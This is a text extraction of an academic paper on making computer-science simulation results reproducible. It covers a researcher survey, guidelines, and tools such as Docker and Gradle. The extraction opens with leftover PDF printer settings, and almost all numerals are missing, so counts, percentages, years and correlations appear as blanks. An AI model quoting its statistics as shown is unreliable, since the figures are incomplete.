(none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice making simulation results reproducible-survey, guidelines, and examples based on gradle and docker making simulation results reproducible— survey, guidelines, and examples based on gradle and docker wilfried elmenreich, philipp moll, sebastian theuermann and mathias lux universität klagenfurt, klagenfurt, austria abstract this article addresses two research questions related to reproducibility within the context of research related to computer science. first, a survey on reproducibility addressed to researchers in the academic and private sectors is described and evaluated. the survey indicates a strong need for open and easily accessible results, in particular, reproducing an experiment should not require too much effort. the results of the survey are then used to formulate guidelines for making research results reproducible. in addition, this article explores four approaches based on software tools that could bring forward reproducibility in research results. after a general analysis of tools, three examples are further investigated based on actual research projects which are used to evaluate previously introduced tools. results indicate that the evaluated tools contribute well to making simulation results reproducible but due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly. subjects data science, scientific computing and simulation, software engineering keywords in-silico research, reproducibility, simulation introduction reproducibility of experimental results is fundamental in all scientific disciplines. reproducing results of published experiments, however, is often a cumbersome and unrewarding task. casadevall & fang ( ) report that some fields, for example biology, are concerned with complex and chaotic systems which are difficult to reproduce. at the same time, we would expect digital software-based experiments to be easily reproducible, because digital data can be easily provided and computer algorithms on these data are typically well-described and deterministic. however, this is often not the case due to a lack of disclosure of relevant software and data that would be necessary to reproduce results. ongoing open science initiatives aim to have researchers provide access to data and software together with their publications in order to allow reviewers to make well-informed decisions and to provide other researchers with the information and necessary means to build upon and extend original research (ram, ). this article addresses two research questions (rq) related to reproducibility: rq “to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?” rq “what tools can be used to support reproducibility?” how to cite this article elmenreich w, moll p, theuermann s, lux m. . making simulation results reproducible—survey, guidelines, and examples based on gradle and docker. peerj comput. sci. :e doi . /peerj-cs. submitted june accepted november published december corresponding author wilfried elmenreich, wilfried.elmenreich@aau.at academic editor philipp leitner additional information and declarations can be found on page doi . /peerj-cs. copyright elmenreich et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:wilfried.�elmenreich@�aau.�at https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ rq addresses the aspects of the relevance of reproducibility to a researcher’s field, willingness to contribute to making one’s own work reproducible, and possible concerns. an online survey was designed to assess the current practice, subject awareness, and possible concerns. the focus of the survey was on the disciplines computer science, computer engineering, and electrical engineering and it addressed researchers at different positions in universities, research institutions, and companies. to answer rq , we present three examples where three different types of software projects are packaged to provide an accurate and easy possibility for reproducing results in a controlled environment and analyze how these solutions address the requirements derived from the survey. the responses to our online survey confirm our initial assumption that the reproducibility of research results is an important concern in computer science research. one of the researchers’ main reasons for publishing software artifacts along with scientific publications is improved credibility and reliability of results. based on the survey’s results presented in the section “survey”, we infer requirements and general guidelines assisting researchers in making their research reproducible in the section “requirements and general guidelines”. finally, we discuss how different tools comply with the created requirements and guidelines. we find that due to conflicting requirements, none of the presented solutions fulfills all intended goals perfectly. one of the most pressing challenges is to achieve long term availability of results while respecting licensing issues of required third-party dependencies. an in-depth discussion of open issues is elaborated in the section “one tool to reproduce them all?” and we conclude the article and highlight our major findings in the section “conclusion”. related work walters ( ) notes that it is often difficult to reproduce the work described in molecular modeling and chemoinformatics papers. for the most part this is due to the absence of a disclosure requirement in many scientific publication venues thus far. morin et al. ( ) report that in only three of the most cited journals had editorial policies requiring availability of source code after publication. fortunately, this situation is changing for the better, for example science introduced a policy requiring authors to make data and code related to their publication available whenever possible (witten & tibshirani, ; peng, ; hanson, sugden & alberts, ). commenting on this policy, shrader- frechette & oreskes ( ) brought up the issue that although privately funded science may be of high quality, it is not subject to the same requirements for transparency as publicly funded science. another obstacle is the use of closed-source tools and undisclosed software results in publicly funded research software development projects as discussed by morin et al. ( ). vitek & kalibera ( ) address the topic of repeatability and reproducibility for systems research and identify a particular difficulty for embedded systems due to companies being reluctant to release code and that implementations are often bound to specific hardware. focusing on the current state of reproducibility, acm sigcomm computer communication review (ccr) conducted a survey on reproducibility with responses from authors of papers published in ccr and the sigcomm sponsored conferences elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ (bonaventure, ). the responses showed that there is a good awareness of the need for reproducibility and a majority of authors either considered their paper self-contained or have released the software used to perform experiments. however, there were only few releases of experimental data or of modifications of existing open source software. the open question part of the survey indicated a need for encouragement for publishing reproducible work or for papers that attempt to reproduce or refute earlier results. flittner et al. ( ) conducted an analysis of papers from four different acm conferences held in . this study found that the type of artifacts can differ significantly between different communities. the analysis further indicates that even if researchers state that their work is reproducible, the majority of analyzed papers do not provide the complete toolset to reproduce all results. most importantly, the study shows that published artifacts are indeed reused, which is why the authors encourage others to release artifacts. a critical aspect when releasing artifacts is to decide on tools supporting researchers in the process of making research reproducible. several papers report on case studies for data repositories in the context of reproducibility including fields such as geographic information systems (steiniger & hunter, ), astrophysics (allen & schmidt, ), microbiome census (mcmurdie & holmes, ), and neuroimaging (poline et al., ). these examples are promising, but it cannot be expected that the approaches are going to be used beyond the field they have been introduced. simflowny (arbona et al., ) is a platform for formalizing and managing the main elements of a simulation flow, tied not to a field, but to a specified simulation architecture. the whole tale approach (brinckman et al., ) aims at linking data, code, and digital scholarly objects to publications and integrating all parts of the research story. other works focus on code and data management, such as ram ( ) suggesting very general version control systems such as git for transparent data management in order to enable reproducibility of scientific work. the care approach (janin, vincent & duraffort, ) extends the archiving concept with an execution system for linux systems, which also takes software installation and dependencies into account. docker (boettiger, ), which will be examined more closely in this article, provides an even more generic approach by utilizing virtualization for providing cross-platform portability. a tutorial for using docker to improve reproducibility in software and web engineering research was published in cito, ferme & gall ( ). reprozip by chirigati, shasha & freire ( ) provided a packing and unpacking mechanism for linux systems allowing the creation of a package from a computer experiment which can be unpacked on another target machine, including support for unpacking into a docker image. in contrast to the work presented above, our work focuses on the researchers’ requirements regarding reproducibility independent of the capabilities of individual tools. based on survey responses, we infer requirements and guidelines for making research reproducible and further analyze how different tools for packaging software artifacts comply with the researchers’ needs. we further identify limitations of current tools and raise awareness of researchers on the pros and cons of using different types of applications for making research reproducible. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ survey in computer science, a large amount of research is backed up by prototypes, implementations of algorithms, benchmarking and evaluation tools, and data generated in the course of research. a critical factor for cutting edge research is to be able to build upon the results of other researchers or groups by extending their ideas, applying them to new domains or by reflecting them from a new angle. this is easily done with scientific publications, which are mostly available online. while the hypotheses, findings, models, processes, and equations are published, the data generated and the tools used for generating data and evaluating new approaches are sometimes only pointed out but have to be found elsewhere. our hypothesis in that direction is that there is a gap between scientific publishing on one hand and the publication of software artifacts and data for making results reproducible for other researchers on the other. in that sense, we created a survey asking researchers in the computer science field for their approach and opinion. methodology the survey design is driven by our research question rq (“to what extent is reproducibility of results based on software artifacts important in the field of computer science and in related research areas?”). the survey consists of five parts. first, basic demographic information, including the type of research, the area of research, the typical research contribution, and the type of organization the researchers are working for, is collected. second, the common practice of the researchers for publishing software artifacts and data is surveyed. third, we focus on the researchers’ expectations regarding the procedure of reproducing scientific results. fourth, we ask for opinions on integrating the question of reproducibility in the peer review process. finally, we collect additional thoughts with open questions. five-point likert scales are used to indicate the level of agreement in the survey. for questions where likert scales are not applicable, single-choice or multiple-choice questions (e.g., “what are the typical results of your research work?”), or numerical inputs without predefined range or categories (e.g., “how much time (in hours) are you willing to invest to make the results of a paper reproducible?”) are used. generally, we did not offer a “i don’t know” or similar option. for single-choice and multiple-choice questions we discussed the nominal scales based on related work as well as the authors’ experience. pilots with people neither involved with the questionnaire nor taking part in the final survey were conducted to reduce the chance of leaving out important options. for the sake of completeness, custom values are allowed in addition to the given options, to allow researchers to report on their practice. open-ended questions are only used where other types of questions might limit the spectrum of answers. the survey was set up as an anonymous online survey, with no partial answers allowed as all questions were mandatory and only the final submission at the end of the survey would save the results. the survey was distributed via a scientific mailing lists and via personal contacts with the request to distribute the survey among colleagues . the full survey and all responses are included in the supplemental material. the online survey was distributed on the following channels: information-centric networking research group discussion list (https://www.irtf.org/mailman/ listinfo/icnrg); the google group comp. simulation (https://groups.google.com/ forum/#!forum/comp.simulation); the authors’ facebook and twitter profiles; and via personal contacts. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information https://www.irtf.org/mailman/listinfo/icnrg https://www.irtf.org/mailman/listinfo/icnrg https://groups.google.com/forum/#!forum/comp.simulation https://groups.google.com/forum/#!forum/comp.simulation http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ demographics in total, we received responses, mostly from academic researchers. the demographics of survey participants are visualized in fig. . seventy-four out of the participants were working or studying at a university and of of research institutes. thirteen participants noted that they were mainly working for a company, two were private researchers, one from a school. with their position, % of the participants were phd students, % were professors or group leaders, % worked as researchers within a project, % were principal investigators, and % were bachelor or master students at the time of the study. three participants were heads of departments or organizations, and two participants indicated that they were postdoctoral researchers. computer science or computer engineering was the area of research for % of the participants. regarding the area of research, . % of the participants came from electrical engineering, % from information systems, . % from (applied) mathematics, and . % from simulation. furthermore, singular mentions were applied informatics, ciencias sociales, computational biology, computational biology/numerical simulations, computer networks, data analysis, economics, management, materials science, mathematical modeling, medical informatics, physics, scientific computing, and user experience. the population also includes researchers for whom publishing software is common practice; % of the participants have indicated that they have not published any software artifact at the time of the study. survey result summary four aspects of the survey responses are analyzed. first, the relevance of reproducibility for the research community is analyzed. second, we investigate what people are willing to do in order to achieve reproducible research. third, we discuss the researchers’ opinions on reproducibility in the peer review process. finally, we highlight concerns regarding sharing scientific software artifacts. figure summarizes the responses to questions showing the relevance of reproducibility in research. as can be seen, the majority of people wants to reproduce results from other researchers or groups: of indicated agreement. even more ( out of ) considered reproducible results as added value for research papers. it can number of responses other head of department / organisation bachelor or master student principal investigator researcher employed in a project professor / group leader phd student (a) positions number of responses other information systems electrical engineering computer engineering computer science (b) area or research number of responses school i'm a private researcher company research institute university (c) research environment figure demographics of the survey participants including positions (a), area of research (b) and research environment (c). for presentation reasons, categories with less than three researchers were summarized as “other” in (a) and (b). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ be seen that the majority of researchers ( out of ) wants to build their research on the work of others, which requires others to share scientific artifacts. it can be seen from the researchers’ demographics in fig. that the relevance of reproducibility is independent of a researcher’s position, research area, and research environment. the results of the question “i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work” were grouped by position, research area, and research environment. these distributions look very similar for all questions from fig. . a full collection of graphical illustrations of these distributions is included in the supplemental material of the paper. an open-ended question asking why software artifacts should be published yielded diverse answers. the most frequent answers were improvements in credibility and reliability of results, building trust, and improving understanding of the results of others. besides, answers included the benefit of a practical approach by fostering task-based research, increasing visibility for your research by making tools available and open communication to foster research in general. after showing the researchers’ interests in reproducibility, which are aligned with the results from other published surveys, we now evaluate what researchers are willing to do to make their results reproducible for others and how much effort they are willing to invest to reproduce the results of others. focusing on fig. , we see that about half of the researchers typically try to reproduce the results of others by running their tools ( out of ). this again shows the demand for publishing scientific software artifacts. the average amount of time participants would invest in making software of others work to reproduce results was . hours, neglecting two outliers who would spend and strongly agree agree neutral disagree strongly disagree published software artifacts are added value to the published text in the research paper. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. i want to build my research tools by extending on the work (software, tools, or frameworks) of other researchers or groups. figure responses to questions focusing on the general relevance of reproducibility. full-size doi: . /peerj-cs. /fig- strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work.” grouped by researchers’ positions (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ or more hours . the responses to the corresponding survey questions are visualized in fig. a. two participants noted that they would invest more than a month of work time (> h) to reproduce results of others, participants noted that they would invest between a week and a month ( – h), participants would invest up to a week, but less than a day ( – h), would invest up to a day of work ( – h) and only three participants would not invest any time at all. most researchers agreed they would like to publish their software to aid reproducibility. the question of whether researchers want to publish their software tools to allow others to reproduce their results was answered with agreement from the majority of researchers ( out of ) with only disagreeing. when publishing software, out of researchers intend to provide detailed documentation on how to install and run the published software artifact. the question of how many hours researchers want to invest in making their results reproducible led to an average of . hours. we excluded three outliers with answers of , , , and hours as we agreed that the answer of , hours—in other words work weeks—and more is more likely to be a misunderstanding of the question and may include the original research work in addition to the extra work of making the results reproducible. the results can be seen in fig. b. summarizing the results in clusters results in two participants investing more than a month of work time (> h), seven participants would invest up to a month ( – h), participants indicating they would invest up to week of work time ( – h), participants reporting to invest up to a day ( – h), and only four indicating that they would not invest any time. interpreting these numbers, we see that researchers are willing to invest more time to make their own research reproducible than to reproduce the results of others. strongly agree agree neutral disagree strongly disagree i typically try to reproduce the research results of other groups or researchers by installing and running their tools. when i publish software i intend to provide detailed documentation on how to install and run the software. i want to publish software tools an methods from my research to allow others to reproduce my results figure responses to questions focusing on what researchers are willing to do to achieve reproducible results or to share artifacts. full-size doi: . /peerj-cs. /fig- responses ranked by value ti m e [h ] a) how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? responses ranked by value ti m e [h ] b) how much time (in hours) are you willing to invest to make the results of a paper reproducible? responses ranked by value ti m e [y ea rs ] c) how long (in years) do you think software for reproducing research results should be runnable / compilable / available? a b c figure responses to the above questions on how much hours researcher would invest into reproducing (a) and making reproducible (b) as well as how many years result should be reproducible (c). note that the y-axis is logarithmic. full-size doi: . /peerj-cs. /fig- using the range of mean ± times standard deviation for outlier detection elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the results of a multiple-choice question asking for the typical composition of research results shows that software implementations and datasets are already common artifacts of today’s research, indicating the potential utility of making research reproducible. besides results in written form— researchers mentioned published papers and participants reports with detailed results—a software implementation is part of the research results for participants and participants mentioned a dataset being part of their results. another important aspect for reproducible research is the long-term availability of results and artifacts. the effort of preparing and publishing software artifacts and results would ultimately be in vain if the artifacts later become inaccessible. participants were asked about their opinion on how long results and necessary software artifacts should be available after initial publication. the results can be seen in fig. c. with the exception of five outliers (with seven answers of for not supporting reproducibility at all, as well as , , and years, which is too long a time for all currently known digital storage media to survive), the participants stated that software for reproducing results should be available for an average of . years. summarizing through clusters participants stated it should be from . to years, indicated it should be – years, state – years, and nine think it should be more than years available. asked about how they share research artifacts or make results reproducible, out of participants stated to have already published software at the time of their participation in the survey. means of making their results reproducible were—multiple means could be specified—detailed instructions ( ), make scripts ( ), installation scripts ( ), virtualization software ( ), and container frameworks ( ). there were two mentions of hosting web front ends as means of making results available and three mentions of public source code repositories as platforms for distribution. now that we are aware of current practices for making results reproducible, we focus on the role of reproducibility in the peer review process. our assumption is that testing for reproducibility during the peer review process could enhance the credibility of published results and thereby increase the quality of a paper. this opinion is shared by the survey participants as visualized in fig. : a total of out of participants stated that checking for reproducibility should be part of the peer review process. furthermore, out of participants would be willing to check results in addition to the traditional peer review process. here, differences among different positions and research areas can be found (see fig. ). when focusing on the researchers’ position, nine out of bachelor or master students showed agreement, with none indicating disagreement. principal investigators indicated the lowest agreement. differences can also be seen regarding different research areas. researchers from computer engineering showed the least agreement, whereas electrical strongly agree agree neutral disagree strongly disagree checking for reproducibility of research results should be part of a peer review process. as a reviewer i would be willing to check research results in addition to the traditional peer review. figure responses on questions focusing on the role of reproducibility in the peer review process. full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ engineers indicated the most agreement. researchers from other research areas, including computer science, indicated a similar interest. no differences between different research environments were identified. when analyzing the survey results on the researchers’ concerns regarding publishing scientific software artifacts, we can see that the traditional payment models of scientific publishers used for research papers are seen as critical for publishing software artifacts. figure shows that out of researchers indicate that their results can be reproduced with free and open source software. this goes hand in hand with researchers’ reluctance to pay for publishing or accessing software artifacts. only out of researchers are willing to pay for making software tools, frameworks, and subsequently their results to be available to other researchers. a few more, but still only out of researchers indicate agreement with paying for being able to reproduce the results of others. these responses indicate the importance of possibilities for sharing software artifacts free of charge regardless of the platform. moreover, even researchers willing to pay for software, might face problems due to closed-source components or other limitations. continuing in this vein, we asked why results cannot be reproduced using open source tools. a total of participants indicated the use of paid-for programming language environments, the use of licensed operating systems, the use of copyrighted materials, and the use of commercial tools. computer security, when installing programs from others, is not a major concern for out of participants, which is alarming when reflecting on possible security issues. an explanation could be that the researchers’ awareness is low because they themselves would not harm others and believe others to be benevolent as well. however, this mindset does not account for security issues that do not originate from other researchers, but from strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “as a reviewer i would be willing to check research results in addition to the traditional peer review.” grouped by the researchers’ position (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- strongly agree agree neutral disagree strongly disagree is it possible to reproduce your research results with fre e and open source software? i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. i am willing to pay for easily accessible software tools and for being able to reproduce the results of other researchers. local computer security and local data security is a major concern for me when installing and running software from other researchers. figure responses to questions focusing on additional concerns when publishing scientific artifacts. full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ used third-party libraries. therefore, software from unknown sources, or with unknown dependencies, should always be handled with care. we further see that security awareness depends on the researchers’ position (see fig. ). undergraduate and master students indicate the highest awareness of security risks, while professors and principal investigators the lowest. a possible interpretation is that researchers in higher positions neglect security issues because of the high pressure to progress research. students, in contrast, focus on smaller tasks and complete them more carefully. regarding security awareness across different research areas, computer engineers have the highest awareness with out of researchers indicating agreement on the question “local computer security and local data security is a major concern for me when installing and running software from other researchers.” for other fields, the awareness or lack thereof is almost equally low. besides economical and security concerns, we also asked researchers about additional reservations. a multiple-choice question on major concerns showed that when installing and running software from other researchers the ease of installation is a prominent topic. this questions allowed for multiple choice as well as an other option, where participants could voice their concerns. answers included: � ease of the installation (without major barriers) ( mentions), � hardware requirements like computation power, memory, or specialized equipment ( mentions), � license issues ( mentions), � size of the download and installation ( mentions), � used harddisk space after installation (two mentions), � i don’t see additional concerns (eight mentions), � other (with the option of giving text here). five other answers were entered: � “i am sure it does not run on the first try nine out of times,” � “external dependencies and their updateability/patchability in case of security fixes (should never depend on the initial publisher for third party libraries because they’d strongly agree agree neutral disagree strongly disagree (a) position all responses other professor / group leader principal investigator researcher employed in a project phd student bachelor or master student (b) area of research all responses other electrical engineering computer engineering computer science (c) research environment all responses other company research institute university figure responses to the question “local computer security and local data security is a major concern for me when installing and running software from other researchers.” grouped by the researchers’ position (a), research area (b) and research environment (c). full-size doi: . /peerj-cs. /fig- elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ have to maintain their old packages for a long time); also important: downards (sic!) compatibility of “new” versions with old data & tools,” � “analytical reporoducability (sic!) & mathematical clarity (or correctness) is my main concern,” � “conflicting versions of additional required software,” � “complex build dependencies.” a final open-ended question was about reservations toward publishing data and software: “i have reservations for publishing software artifacts and data in research because ...” for analysis following the approach of open coding the answers were labeled manually by the authors and the assigned labels were discussed until agreement was reached. the most common cluster of answers noted legal or privacy issues ( ). others pointed out the additional effort needed ( ), commercial interests ( ), missing reward or support for doing so ( ), and that publishing artifacts is not part of the job, that is, not supported by the group or organization ( ) . regarding the aforementioned legal issues, it would be an interesting hypothesis that researchers would be more willing to share if legal issues and efforts are reduced. this may be achieved by license constraints (only licenses others can build upon) or exceptions for publishing research (leaving license issues aside for research by general agreement). correlation analysis given the likert scales for the answers we did investigate the correlation (spearman’s rank correlation) between answers to see if (i) intuitive and expected correlations exist and (ii) new and surprising correlations can be found. table shows all correlations with jρj > . . the strongest correlation to be found with a coefficient of ρ = . and a p-value < . was between the questions “checking for reproducibility of research results should be part of a peer review process” and “as a reviewer i would be willing to check research results in addition to the traditional peer review.” hence, people who stated to be willing to do reproducibility checks were more likely to find the idea of a review process with mandatory reproducibility checks attractive. another strong correlation (ρ = . , p < . ) was found between the questions “how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running?” and “how much time (in hours) are you willing to invest to make the results of a paper reproducible?” with that correlation one can hypothesize that researchers with reproducibility in mind invest time in reproducing results as well as making their results reproducible. a less strong but still rather interesting correlation (ρ = . , p < . ) was found between “i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers.” and “i am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers.” so with the overhead of participants not willing to pay for access and publishing of in context of reproducibility as indicated in fig. , it is likely that researchers either like the idea of either paying for both, publishing and access, or none. the raw data with all the responses is included in the supplemental material. correlations of jρj < . are generally considered as poor or weak correlations and hence not included in the table. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ threats to validity while a minor bias is assumed to be caused by the study’s title as participants may have been attracted by the title if they could identify with the topic of reproducibility, it is still valid to discuss the implications of the findings. one possible limitation of the survey is the missing geographical distribution of the participants. we did not include questions on where participants are located or work primarily, and did not collect ip addresses. hence, we cannot conclude if the survey result indicates a global trend, or if the preferences of researchers from different geographic regions differ. similarly, a possible gender gap of the survey’s participants can not be evaluated. for single and multiple choice questions with a pre-defined answer set in the survey, the set of answers can introduce a certain bias to the results. therefore, it was decided to avoid such questions if the risk of bias was high. in that sense, we also avoided quantizing numeric input, for example, the hours people spend making their work reproducible. if it was necessary, we always included an open-ended answer option. the pilot, survey of related work, and critical reflection by the authors were used as tools to minimize the bias. in one single case, that is, the question “which of the following are table correlations in the survey answers with jρj > . using spearman’s rank correlation. questions ρ p-value checking for reproducibility of research results should be part of a peer review process. . < . as a reviewer i would be willing to check research results in addition to the traditional peer review. how much time (in hours) are you willing to invest into reproducing a result or get the software tools of others installed and running? . < . how much time (in hours) are you willing to invest to make the results of a paper reproducible? i am willing to pay for open access to my research software tools and frameworks to make them available to other researchers. . < . i am willing to pay for easily accessible software tools and for being able to reproduce results of other researchers. i want to publish software tools and methods from my research to allow others to reproduce my results. . < . when i publish software i intend to provide detailed documentation on how to install and run the software. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. i want to reproduce the results of other researchers or groups from their original work (software tools or libraries) to compare it to my work. . < . i typically try to reproduce the research results of other groups or researchers by installing and running their tools. when i publish software i intend to provide detailed documentation on how to install and run the software. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. when i publish software i intend to provide detailed documentation on how to install and run the software. . < . i typically try to reproduce the research results of other groups or researchers by installing and running their tools. published software artifacts are added value to the published text in the research paper. . < . i want to build my research tools by extending on the work (software, tools or frameworks) of other researchers or groups. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional concerns when installing and running software from other researchers?” the open-ended answer option showed that at least one pre-determined answer was missing. several participants noted complex build dependencies (also mentioned as conflicting versions of additional required libraries or external dependencies) are likely to be another major concern. participants could have had overlaps in the categorization of positions, for example a person could be a phd student and an employed researcher in a project at the same time. in this case participants might have selected the category randomly or selected the category they appreciate more. despite this, as long as no intentional or unintentional mistakes are made in the answers, each category will contain samples that are member of this category. the survey also includes bachelor and master students, where it is not guaranteed that they are involved in research projects. however, due to the dissemination channels we used for advertising the survey, we assume that the participants are invested in research and reproducibility. this is supported by the study where nine out of bachelor or master students indicate to have already published software artifacts. english as the only language for the survey might be a further limitation. nevertheless, english is the working language of the target audience, and consequently, we assume the influence by the survey language to be negligible. requirements and general guidelines the survey results indicate that a majority of researchers of all levels consider reproducibility as very relevant. there is further a strong interest in doing work to make one’s own results reproducible, a strong interest to use results of others for comparison to own work, and to some extent, a motivation to try to reproduce work for review purposes. to achieve this, it is necessary to make all information that is necessary to reproduce the results available together with a publication. additionally, the effort necessary to reproduce the results needs to match the value of doing the work. work reproducing or refuting previous results is overall much less appreciated than original work, so the effort a researcher is willing to invest in order to reproduce previous results is much lower than the effort they are willing to put in to produce new work. on the other hand, when planning to build own research on top of other results the investment can be higher. the most critical case is in reviewing, when reproducibility is intended to be checked as part of the reviewing process. reviewers have a strict timeline to perform their review, so there is a need for a straightforward, mostly automated process to reproduce results. moreover, despite contributing to verifying the results of a paper, reviewers are not mentioned in connection with the work. as reviewers work voluntarily, they are probably the least motivated to reproduce results. moreover, in our study researchers have responded critically to commercial systems introducing payments, either from the publishing researcher side or from the consumer side. a majority of participants also name security as a concern in this context, which highlights an issue to be addressed for researchers being security-aware as well as for those who are less concerned about security. elmenreich et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ in order to address these issues, the following guidelines are proposed: � code, data, and information on how to conduct an experiment should be gathered in a single place (a single container), which can be found in connection with the paper. � the reproduction process should be highly automated (for example by an easy to handle build and execution script). � to address security issues, the published artifacts should be provided as source code and scripts allowing for running the code in a virtual environment should be provided. � commercial libraries and other components that require reviewers to pay for access should be avoided. � since research papers tend to create some interest even long after they have been published, it is necessary to ensure that software and environment for the reproduction process remain available, either by packing all necessary components into a container or by referring to well-archived open source tools. � the time and necessary information to reproduce results should be tested with an independent person. unless the size of the project requires it, the reproduction process should take at most days. existing tools most tools for sharing software artifacts are also used in the development of software artifacts. these could be either tools for simple tasks such as compiling software projects, but also more complex tools for tasks such as automated dependency installation and software packaging. to prevent unnecessarily complex configuration, it is wise to select tools based upon the complexity of the software artifact. software artifacts which are complex to run require more sophisticated tools with high levels of abstraction, 